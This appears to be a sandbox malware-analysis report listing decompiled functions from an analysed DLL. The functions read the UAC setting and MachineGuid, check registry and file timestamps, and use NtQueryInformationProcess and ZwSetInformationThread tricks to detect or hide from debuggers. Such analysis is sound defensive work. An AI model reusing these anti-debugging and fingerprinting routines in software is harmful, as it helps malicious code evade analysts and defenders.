                                                                                                                                                                  0x1001d2c2
                                                                                                                                                                  0x1001d2e6
                                                                                                                                                                  0x1001d307
                                                                                                                                                                  0x1001d312
                                                                                                                                                                  0x1001d312
                                                                                                                                                                  0x1001d319
                                                                                                                                                                  0x1001d319
                                                                                                                                                                  0x1001d325

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 1001D2F6
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                                  • API String ID: 3677997916-2194944742
                                                                                                                                                                  • Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A350, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A350(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;

				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}





                                                                                                                                                                  0x1001a356
                                                                                                                                                                  0x1001a35d
                                                                                                                                                                  0x1001a381
                                                                                                                                                                  0x1001a3a4
                                                                                                                                                                  0x1001a3aa
                                                                                                                                                                  0x1001a3aa
                                                                                                                                                                  0x1001a3b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001a3bb
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001A3B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                  • API String ID: 3677997916-880526231
                                                                                                                                                                  • Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100118DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E100118DF(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10334594);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10334590);
					_t11 =  *(TlsGetValue( *0x10334594))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10334590);
				 *((intOrPtr*)(E1001158A( *0x10335480)))();
				_push(_t11);
				L100117AC(_t9, _t11, _t15, _t16);
				_t5 =  *0x10334594; // 0x20
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}








                                                                                                                                                                  0x100118df
                                                                                                                                                                  0x100118ec
                                                                                                                                                                  0x100118ee
                                                                                                                                                                  0x100118f0
                                                                                                                                                                  0x100118f2
                                                                                                                                                                  0x10011902
                                                                                                                                                                  0x10011902
                                                                                                                                                                  0x10011904
                                                                                                                                                                  0x10011905
                                                                                                                                                                  0x10011907
                                                                                                                                                                  0x10011919
                                                                                                                                                                  0x1001191b
                                                                                                                                                                  0x1001191c
                                                                                                                                                                  0x10011922
                                                                                                                                                                  0x1001192a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001192f
                                                                                                                                                                  0x10011935

                                                                                                                                                                  APIs
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118EC
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118FE
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011913
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000020,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550,0000000C,1000EC47), ref: 1001192F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$__decode_pointer
                                                                                                                                                                  • String ID: tj
                                                                                                                                                                  • API String ID: 3389472636-3491506833
                                                                                                                                                                  • Opcode ID: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction ID: 5ea32f06f5c113a557663da0afc6a555ab05ec8127c22f0ad06d45371975ea5c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c7f06b116b2131f449bc60c8500541cc33991b08cb4f8d3606f4d7b1ebcba75
                                                                                                                                                                  • Instruction Fuzzy Hash: 25E06D3A800120AFFA059B759CC4B693F6AFBCA661F110111F12CDE0B2DE31ECA29A00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1001A000() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                                  0x1001a006
                                                                                                                                                                  0x1001a018
                                                                                                                                                                  0x1001a02a
                                                                                                                                                                  0x1001a03e
                                                                                                                                                                  0x1001a04d

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 1001A012
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 1001A024
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 1001A037
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 353374858-801751246
                                                                                                                                                                  • Opcode ID: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction ID: 71e2acb23208394f78a226fd07bfd7a9a839184327190de95aec6d8225f51f41
                                                                                                                                                                  • Opcode Fuzzy Hash: 38e3ca949b96ec1f02b6c056c4686b534a5e8ee6be15c149bd05a26a226aa475
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0A575D44208FFEB10EBE0DD8DB9DBBB8EB04201F614494EA15A6180EA746A49CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019DA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E10019DA0() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                                  0x10019db1
                                                                                                                                                                  0x10019dc3
                                                                                                                                                                  0x10019dd9

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 10019DCC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                                  • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                  • API String ID: 903204110-1680533912
                                                                                                                                                                  • Opcode ID: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction ID: ec36d98e740d09ce498d664616d1e94f1a85ab36ce5175e8c059281a5b49cb64
                                                                                                                                                                  • Opcode Fuzzy Hash: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0E674944208FBEF009BE09D8DB9CBB78EB04702FA14051FF05A6280DA715A454AA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F500, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F500(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}











                                                                                                                                                                  0x1001f506
                                                                                                                                                                  0x1001f50d
                                                                                                                                                                  0x1001f514
                                                                                                                                                                  0x1001f536
                                                                                                                                                                  0x1001f560
                                                                                                                                                                  0x1001f562
                                                                                                                                                                  0x1001f568
                                                                                                                                                                  0x1001f56e
                                                                                                                                                                  0x1001f574
                                                                                                                                                                  0x1001f57a
                                                                                                                                                                  0x1001f580
                                                                                                                                                                  0x1001f586
                                                                                                                                                                  0x1001f594
                                                                                                                                                                  0x1001f5a0
                                                                                                                                                                  0x1001f5a3
                                                                                                                                                                  0x1001f5b4
                                                                                                                                                                  0x1001f5b7
                                                                                                                                                                  0x1001f5b7
                                                                                                                                                                  0x1001f5be
                                                                                                                                                                  0x1001f5be
                                                                                                                                                                  0x1001f5cd

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F52E
                                                                                                                                                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F5AF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3147484438-0
                                                                                                                                                                  • Opcode ID: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction ID: f30bdbee4ac12bde428f6f044f578bd3b240634cd6c104924fe674acfb2d543b
                                                                                                                                                                  • Opcode Fuzzy Hash: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 87210D75D10208ABEB00CFD4C898FEEB7B9FF48704F109148EA14BB290D7759A49CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F430, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F430(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}












                                                                                                                                                                  0x1001f436
                                                                                                                                                                  0x1001f43d
                                                                                                                                                                  0x1001f450
                                                                                                                                                                  0x1001f472
                                                                                                                                                                  0x1001f479
                                                                                                                                                                  0x1001f495
                                                                                                                                                                  0x1001f49b
                                                                                                                                                                  0x1001f4a1
                                                                                                                                                                  0x1001f4a7
                                                                                                                                                                  0x1001f4ad
                                                                                                                                                                  0x1001f4b3
                                                                                                                                                                  0x1001f4b9
                                                                                                                                                                  0x1001f4c7
                                                                                                                                                                  0x1001f4d0
                                                                                                                                                                  0x1001f4d6
                                                                                                                                                                  0x1001f4e7
                                                                                                                                                                  0x1001f4ea
                                                                                                                                                                  0x1001f4ea
                                                                                                                                                                  0x1001f479
                                                                                                                                                                  0x1001f4f6

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 1001F448
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
                                                                                                                                                                  • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F4E2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3038978132-0
                                                                                                                                                                  • Opcode ID: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction ID: 282c7306dc6b684cc064bb2559bb565ca804bda22c30e035a61ca1407b16c130
                                                                                                                                                                  • Opcode Fuzzy Hash: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction Fuzzy Hash: 4621EA75910208ABEB10DFD4D895FEEB7B8FF04704F108208E505BB290DB75A685CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019390, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAD0(_a4);
				_t18 = E1000CAD0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAD0(_a8);
						_t21 = E1000CAD0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                                                                                                                                  0x10019390
                                                                                                                                                                  0x10019390
                                                                                                                                                                  0x1001939b
                                                                                                                                                                  0x100193a9
                                                                                                                                                                  0x100193ae
                                                                                                                                                                  0x100193b3
                                                                                                                                                                  0x100193be
                                                                                                                                                                  0x100193c1
                                                                                                                                                                  0x100193dc
                                                                                                                                                                  0x100193e0
                                                                                                                                                                  0x100193f1
                                                                                                                                                                  0x100193f6
                                                                                                                                                                  0x100193fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019412
                                                                                                                                                                  0x10019417
                                                                                                                                                                  0x1001941c
                                                                                                                                                                  0x100193d0
                                                                                                                                                                  0x100193d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100193d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001941e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019427
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
                                                                                                                                                                  • Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000EAC5, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1000EAC5(void* __ebx, void* __edi) {

				E100115F6();
				if(E10014911(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10334590);
					__eax = E1001158A( *0x10335480);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}



                                                                                                                                                                  0x1000eac5
                                                                                                                                                                  0x1000eadc
                                                                                                                                                                  0x1000eae2
                                                                                                                                                                  0x1000eae3
                                                                                                                                                                  0x1000eaef
                                                                                                                                                                  0x1000eaf7
                                                                                                                                                                  0x1000eaf9
                                                                                                                                                                  0x1000eb12
                                                                                                                                                                  0x1000eb13
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000eafb
                                                                                                                                                                  0x1000eafb
                                                                                                                                                                  0x1000eafc
                                                                                                                                                                  0x1000eafd
                                                                                                                                                                  0x1000eb04
                                                                                                                                                                  0x1000eb0a
                                                                                                                                                                  0x1000eb0e
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eaf9
                                                                                                                                                                  0x1000eb31

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 1000EAC5
                                                                                                                                                                    • Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
                                                                                                                                                                    • Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
                                                                                                                                                                    • Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 1000EAD1
                                                                                                                                                                    • Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
                                                                                                                                                                    • Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 1000EAEF
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • __initptd.LIBCMT ref: 1000EAFD
                                                                                                                                                                    • Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103315D0,0000000C,1001176F,00000000,00000000), ref: 1001166E
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
                                                                                                                                                                    • Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
                                                                                                                                                                    • Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1000EB04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
